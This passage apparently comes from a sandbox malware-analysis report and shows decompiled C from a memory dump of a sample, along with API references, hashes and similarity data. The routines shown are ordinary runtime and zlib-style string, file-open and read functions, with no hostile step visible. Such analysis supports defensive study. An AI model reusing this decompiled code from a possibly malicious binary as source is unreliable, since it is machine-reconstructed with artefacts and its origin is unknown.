                                                                        									E0040BA30(_t182, _t182, 0, _v12);
                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                        									_v12 = _t123;
                                                                        									__eflags = _t123;
                                                                        									if(_t123 != 0) {
                                                                        										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                        										_v20 = _t186;
                                                                        										asm("sbb esi, esi");
                                                                        										_t184 =  ~_t186 & _v12;
                                                                        										__eflags = _t184;
                                                                        									} else {
                                                                        										_t184 = 0;
                                                                        									}
                                                                        									E004147AE(_t182);
                                                                        									goto L78;
                                                                        								}
                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                        								if(_t121 > 0xffffffe0) {
                                                                        									goto L71;
                                                                        								}
                                                                        								_t127 =  &(_t121[4]);
                                                                        								__eflags = _t127 - 0x400;
                                                                        								if(_t127 > 0x400) {
                                                                        									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                        									__eflags = _t128;
                                                                        									if(_t128 != 0) {
                                                                        										 *_t128 = 0xdddd;
                                                                        										_t128 = _t128 + 8;
                                                                        										__eflags = _t128;
                                                                        									}
                                                                        									_t182 = _t128;
                                                                        									goto L72;
                                                                        								}
                                                                        								E0040CFB0(_t127);
                                                                        								_t182 = _t191;
                                                                        								__eflags = _t182;
                                                                        								if(_t182 == 0) {
                                                                        									goto L62;
                                                                        								}
                                                                        								 *_t182 = 0xcccc;
                                                                        								_t182 = _t182 + 8;
                                                                        								goto L72;
                                                                        							}
                                                                        							L62:
                                                                        							_t184 = 0;
                                                                        							goto L78;
                                                                        						} else {
                                                                        							goto L58;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t112 != 1) {
                                                                        							L58:
                                                                        							_t116 = 0;
                                                                        							L84:
                                                                        							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                        						}
                                                                        						_v12 = 0;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t184 = MultiByteToWideChar;
                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                        						_t207 = _t182;
                                                                        						if(_t207 == 0) {
                                                                        							goto L58;
                                                                        						} else {
                                                                        							if(_t207 <= 0) {
                                                                        								L28:
                                                                        								_v16 = 0;
                                                                        								L29:
                                                                        								if(_v16 == 0) {
                                                                        									goto L58;
                                                                        								}
                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                        									L52:
                                                                        									E004147AE(_v16);
                                                                        									_t116 = _v12;
                                                                        									goto L84;
                                                                        								}
                                                                        								_t184 = LCMapStringW;
                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                        								_v12 = _t174;
                                                                        								if(_t174 == 0) {
                                                                        									goto L52;
                                                                        								}
                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                        									__eflags = _t174;
                                                                        									if(_t174 <= 0) {
                                                                        										L44:
                                                                        										_t184 = 0;
                                                                        										__eflags = 0;
                                                                        										L45:
                                                                        										__eflags = _t184;
                                                                        										if(_t184 != 0) {
                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                        											__eflags = _t141;
                                                                        											if(_t141 != 0) {
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        												__eflags = _a24;
                                                                        												if(_a24 != 0) {
                                                                        													_push(_a24);
                                                                        													_push(_a20);
                                                                        												} else {
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        												}
                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                        											}
                                                                        											E004147AE(_t184);
                                                                        										}
                                                                        										goto L52;
                                                                        									}
                                                                        									_t144 = 0xffffffe0;
                                                                        									_t179 = _t144 % _t174;
                                                                        									__eflags = _t144 / _t174 - 2;
                                                                        									if(_t144 / _t174 < 2) {
                                                                        										goto L44;
                                                                        									}
                                                                        									_t52 = _t174 + 8; // 0x8
                                                                        									_t146 = _t174 + _t52;
                                                                        									__eflags = _t146 - 0x400;
                                                                        									if(_t146 > 0x400) {
                                                                        										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                        										__eflags = _t147;
                                                                        										if(_t147 != 0) {
                                                                        											 *_t147 = 0xdddd;
                                                                        											_t147 =  &(_t147[4]);
                                                                        											__eflags = _t147;
                                                                        										}
                                                                        										_t184 = _t147;
                                                                        										goto L45;
                                                                        									}
                                                                        									E0040CFB0(_t146);
                                                                        									_t184 = _t189;
                                                                        									__eflags = _t184;
                                                                        									if(_t184 == 0) {
                                                                        										goto L52;
                                                                        									}
                                                                        									 *_t184 = 0xcccc;
                                                                        									_t184 =  &(_t184[4]);
                                                                        									goto L45;
                                                                        								}
                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                        								}
                                                                        								goto L52;
                                                                        							}
                                                                        							_t150 = 0xffffffe0;
                                                                        							_t179 = _t150 % _t182;
                                                                        							if(_t150 / _t182 < 2) {
                                                                        								goto L28;
                                                                        							}
                                                                        							_t25 = _t182 + 8; // 0x8
                                                                        							_t152 = _t182 + _t25;
                                                                        							if(_t182 + _t25 > 0x400) {
                                                                        								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                        								__eflags = _t153;
                                                                        								if(_t153 == 0) {
                                                                        									L27:
                                                                        									_v16 = _t153;
                                                                        									goto L29;
                                                                        								}
                                                                        								 *_t153 = 0xdddd;
                                                                        								L26:
                                                                        								_t153 =  &(_t153[4]);
                                                                        								goto L27;
                                                                        							}
                                                                        							E0040CFB0(_t152);
                                                                        							_t153 = _t189;
                                                                        							if(_t153 == 0) {
                                                                        								goto L27;
                                                                        							}
                                                                        							 *_t153 = 0xcccc;
                                                                        							goto L26;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t178 = _a16;
                                                                        				_t157 = _a12;
                                                                        				while(1) {
                                                                        					_t178 = _t178 - 1;
                                                                        					if( *_t157 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t157 =  &(_t157[1]);
                                                                        					if(_t178 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					_t178 = _t178 | 0xffffffff;
                                                                        					break;
                                                                        				}
                                                                        				_t160 = _a16 - _t178 - 1;
                                                                        				if(_t160 < _a16) {
                                                                        					_t160 = _t160 + 1;
                                                                        				}
                                                                        				_a16 = _t160;
                                                                        				goto L13;
                                                                        			}
                                                                        0x004171e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004171ef
                                                                        0x0041721a
                                                                        0x0041721c
                                                                        0x00417263
                                                                        0x00417263
                                                                        0x00417263
                                                                        0x00417265
                                                                        0x00417265
                                                                        0x00417267
                                                                        0x00417277
                                                                        0x0041727d
                                                                        0x0041727f
                                                                        0x00417281
                                                                        0x00417282
                                                                        0x00417283
                                                                        0x00417286
                                                                        0x0041728c
                                                                        0x0041728f
                                                                        0x00417288
                                                                        0x00417288
                                                                        0x00417289
                                                                        0x00417289
                                                                        0x004172a0
                                                                        0x004172a0
                                                                        0x004172a4
                                                                        0x004172a9
                                                                        0x00000000
                                                                        0x00417267
                                                                        0x00417222
                                                                        0x00417223
                                                                        0x00417225
                                                                        0x00417228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041722a
                                                                        0x0041722a
                                                                        0x0041722e
                                                                        0x00417233
                                                                        0x0041724c
                                                                        0x00417252
                                                                        0x00417254
                                                                        0x00417256
                                                                        0x0041725c
                                                                        0x0041725c
                                                                        0x0041725c
                                                                        0x0041725f
                                                                        0x00000000
                                                                        0x0041725f
                                                                        0x00417235
                                                                        0x0041723a
                                                                        0x0041723c
                                                                        0x0041723e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417240
                                                                        0x00417246
                                                                        0x00000000
                                                                        0x00417246
                                                                        0x004171f4
                                                                        0x00417213
                                                                        0x00417213
                                                                        0x00000000
                                                                        0x004171f4
                                                                        0x00417163
                                                                        0x00417164
                                                                        0x00417169
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041716b
                                                                        0x0041716b
                                                                        0x00417174
                                                                        0x0041718a
                                                                        0x00417190
                                                                        0x00417192
                                                                        0x0041719d
                                                                        0x0041719d
                                                                        0x00000000
                                                                        0x0041719d
                                                                        0x00417194
                                                                        0x0041719a
                                                                        0x0041719a
                                                                        0x00000000
                                                                        0x0041719a
                                                                        0x00417176
                                                                        0x0041717b
                                                                        0x0041717f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417181
                                                                        0x00000000
                                                                        0x00417181
                                                                        0x00417157
                                                                        0x00417109
                                                                        0x004170df
                                                                        0x004170e2
                                                                        0x004170e5
                                                                        0x004170e5
                                                                        0x004170e8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004170ea
                                                                        0x004170ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004170ef
                                                                        0x00000000
                                                                        0x004170ef
                                                                        0x004170f7
                                                                        0x004170fb
                                                                        0x004170fd
                                                                        0x004170fd
                                                                        0x004170fe
                                                                        0x00000000

                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,020318D8), ref: 004170C5
                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                        • __freea.LIBCMT ref: 004172A4
                                                                        • __freea.LIBCMT ref: 004172AD
                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                        • _malloc.LIBCMT ref: 00417362
                                                                        • _memset.LIBCMT ref: 00417384
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                        • __freea.LIBCMT ref: 004173CF
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                        • String ID:
                                                                        • API String ID: 3809854901-0
                                                                        • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                        • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004057B0(intOrPtr* __eax) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t57;
                                                                        				char* _t60;
                                                                        				char _t62;
                                                                        				intOrPtr _t63;
                                                                        				char _t64;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr* _t83;
                                                                        				void* _t86;
                                                                        				char* _t88;
                                                                        				char* _t89;
                                                                        				intOrPtr* _t91;
                                                                        				intOrPtr* _t93;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				void* _t102;
                                                                        				void* _t103;
                                                                        				void* _t104;
                                                                        
                                                                        				_t98 = _t97 | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                        				_t91 = __eax;
                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                        					_t101 = _t100 + 4;
                                                                        					if(_t93 == 0) {
                                                                        						L31:
                                                                        						return 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                        						 *_t93 = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                        						_t102 = _t101 + 0xc;
                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                        						_t87 = _t57 + 1;
                                                                        						do {
                                                                        							_t82 =  *_t57;
                                                                        							_t57 = _t57 + 1;
                                                                        						} while (_t82 != 0);
                                                                        						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                        						_t103 = _t102 + 4;
                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                        						if(_t60 == 0) {
                                                                        							L30:
                                                                        							E00405160(0, _t87, _t93);
                                                                        							goto L31;
                                                                        						} else {
                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                        							_t88 = _t60;
                                                                        							goto L7;
                                                                        							L9:
                                                                        							L9:
                                                                        							if( *_t91 == 0x72) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                        							}
                                                                        							_t63 =  *_t91;
                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                        							}
                                                                        							_t64 =  *_t91;
                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                        								__eflags = _t64 - 0x66;
                                                                        								if(_t64 != 0x66) {
                                                                        									__eflags = _t64 - 0x68;
                                                                        									if(_t64 != 0x68) {
                                                                        										__eflags = _t64 - 0x52;
                                                                        										if(_t64 != 0x52) {
                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                        											 *_t89 = _t64;
                                                                        											_t87 = _t89 + 1;
                                                                        											__eflags = _t87;
                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                        										}
                                                                        									} else {
                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                        									}
                                                                        								} else {
                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                        								}
                                                                        							} else {
                                                                        								_t98 = _t64 - 0x30;
                                                                        							}
                                                                        							_t91 = _t91 + 1;
                                                                        							if(_t64 == 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_t87 = _t103 + 0x68;
                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                        								goto L9;
                                                                        							}
                                                                        							L26:
                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                        							if(_t65 == 0) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								if(_t65 != 0x77) {
                                                                        									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                        									 *_t93 = _t66;
                                                                        									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                        									_t104 = _t103 + 0x14;
                                                                        									__eflags = _t67;
                                                                        									if(_t67 != 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                        										if(__eflags == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											goto L34;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									_push(0x38);
                                                                        									_push("1.2.3");
                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                        									_push(8);
                                                                        									_push(0xfffffff1);
                                                                        									_push(8);
                                                                        									_push(_t98);
                                                                        									_push(_t93);
                                                                        									_t91 = E00404CE0();
                                                                        									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									_t104 = _t103 + 0x24;
                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										L34:
                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                        										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        										__eflags = _t69;
                                                                        										_push(_t104 + 0x18);
                                                                        										if(__eflags >= 0) {
                                                                        											_push(_t69);
                                                                        											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                        										} else {
                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                        											_t70 = E0040CB9D();
                                                                        										}
                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                        										__eflags = _t70;
                                                                        										if(_t70 == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                        												E00405000(_t93, 0);
                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                        												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                        												__eflags = _t74;
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                        												return _t93;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                        												return _t93;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L42;
                                                                        							L7:
                                                                        							_t62 =  *_t83;
                                                                        							 *_t88 = _t62;
                                                                        							_t83 = _t83 + 1;
                                                                        							_t88 = _t88 + 1;
                                                                        							if(_t62 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                        							}
                                                                        							goto L9;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L42:
                                                                        			}


































                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • _malloc.LIBCMT ref: 00405842
                                                                        • _malloc.LIBCMT ref: 00405906
                                                                        • _malloc.LIBCMT ref: 00405930
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID: 1.2.3
                                                                        • API String ID: 680241177-2310465506
                                                                        • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                        • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                        				signed int _v8;
                                                                        				char* _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t90;
                                                                        				intOrPtr* _t92;
                                                                        				signed int _t94;
                                                                        				char _t97;
                                                                        				signed int _t105;
                                                                        				void* _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t110;
                                                                        				signed int _t113;
                                                                        				intOrPtr* _t114;
                                                                        				signed int _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        				char* _t121;
                                                                        				signed int _t125;
                                                                        				signed int _t131;
                                                                        				signed int _t133;
                                                                        				void* _t134;
                                                                        
                                                                        				_t125 = __edx;
                                                                        				_t121 = _a4;
                                                                        				_t119 = _a8;
                                                                        				_t131 = 0;
                                                                        				_v12 = _t121;
                                                                        				_v8 = _t119;
                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t138 = _t121;
                                                                        					if(_t121 != 0) {
                                                                        						_t133 = _a20;
                                                                        						__eflags = _t133;
                                                                        						if(_t133 == 0) {
                                                                        							L9:
                                                                        							__eflags = _t119 - 0xffffffff;
                                                                        							if(_t119 != 0xffffffff) {
                                                                        								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                        								_t134 = _t134 + 0xc;
                                                                        							}
                                                                        							__eflags = _t133 - _t131;
                                                                        							if(__eflags == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t94 = _t90 | 0xffffffff;
                                                                        								_t125 = _t94 % _a12;
                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                        								if(__eflags > 0) {
                                                                        									goto L3;
                                                                        								}
                                                                        								L13:
                                                                        								_t131 = _a12 * _a16;
                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        								_v20 = _t131;
                                                                        								_t120 = _t131;
                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        									_v16 = 0x1000;
                                                                        								} else {
                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        								}
                                                                        								__eflags = _t131;
                                                                        								if(_t131 == 0) {
                                                                        									L40:
                                                                        									return _a16;
                                                                        								} else {
                                                                        									do {
                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        											L24:
                                                                        											__eflags = _t120 - _v16;
                                                                        											if(_t120 < _v16) {
                                                                        												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                        												__eflags = _t97 - 0xffffffff;
                                                                        												if(_t97 == 0xffffffff) {
                                                                        													L48:
                                                                        													return (_t131 - _t120) / _a12;
                                                                        												}
                                                                        												__eflags = _v8;
                                                                        												if(_v8 == 0) {
                                                                        													L44:
                                                                        													__eflags = _a8 - 0xffffffff;
                                                                        													if(__eflags != 0) {
                                                                        														E0040BA30(_t131, _a4, 0, _a8);
                                                                        														_t134 = _t134 + 0xc;
                                                                        													}
                                                                        													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													L4:
                                                                        													E0040E744(_t125, _t131, _t133);
                                                                        													goto L5;
                                                                        												}
                                                                        												_t123 = _v12;
                                                                        												_v12 = _v12 + 1;
                                                                        												 *_v12 = _t97;
                                                                        												_t120 = _t120 - 1;
                                                                        												_t70 =  &_v8;
                                                                        												 *_t70 = _v8 - 1;
                                                                        												__eflags =  *_t70;
                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        												goto L39;
                                                                        											}
                                                                        											__eflags = _v16;
                                                                        											if(_v16 == 0) {
                                                                        												_t105 = 0x7fffffff;
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t105 = _t120;
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t55 = _t120 % _v16;
                                                                        													__eflags = _t55;
                                                                        													_t125 = _t55;
                                                                        													_t110 = _t120;
                                                                        												} else {
                                                                        													_t125 = 0x7fffffff % _v16;
                                                                        													_t110 = 0x7fffffff;
                                                                        												}
                                                                        												_t105 = _t110 - _t125;
                                                                        											}
                                                                        											__eflags = _t105 - _v8;
                                                                        											if(_t105 > _v8) {
                                                                        												goto L44;
                                                                        											} else {
                                                                        												_push(_t105);
                                                                        												_push(_v12);
                                                                        												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                        												_pop(_t123);
                                                                        												_push(_t106);
                                                                        												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                        												_t134 = _t134 + 0xc;
                                                                        												__eflags = _t107;
                                                                        												if(_t107 == 0) {
                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                        													goto L48;
                                                                        												}
                                                                        												__eflags = _t107 - 0xffffffff;
                                                                        												if(_t107 == 0xffffffff) {
                                                                        													L47:
                                                                        													_t80 = _t133 + 0xc;
                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                        													__eflags =  *_t80;
                                                                        													goto L48;
                                                                        												}
                                                                        												_v12 = _v12 + _t107;
                                                                        												_t120 = _t120 - _t107;
                                                                        												_v8 = _v8 - _t107;
                                                                        												goto L39;
                                                                        											}
                                                                        										}
                                                                        										_t113 =  *(_t133 + 4);
                                                                        										__eflags = _t113;
                                                                        										if(__eflags == 0) {
                                                                        											goto L24;
                                                                        										}
                                                                        										if(__eflags < 0) {
                                                                        											goto L47;
                                                                        										}
                                                                        										_t131 = _t120;
                                                                        										__eflags = _t120 - _t113;
                                                                        										if(_t120 >= _t113) {
                                                                        											_t131 = _t113;
                                                                        										}
                                                                        										__eflags = _t131 - _v8;
                                                                        										if(_t131 > _v8) {
                                                                        											_t133 = 0;
                                                                        											__eflags = _a8 - 0xffffffff;
                                                                        											if(__eflags != 0) {
                                                                        												E0040BA30(_t131, _a4, 0, _a8);
                                                                        												_t134 = _t134 + 0xc;
                                                                        											}
                                                                        											_t114 = E0040BFC1(__eflags);
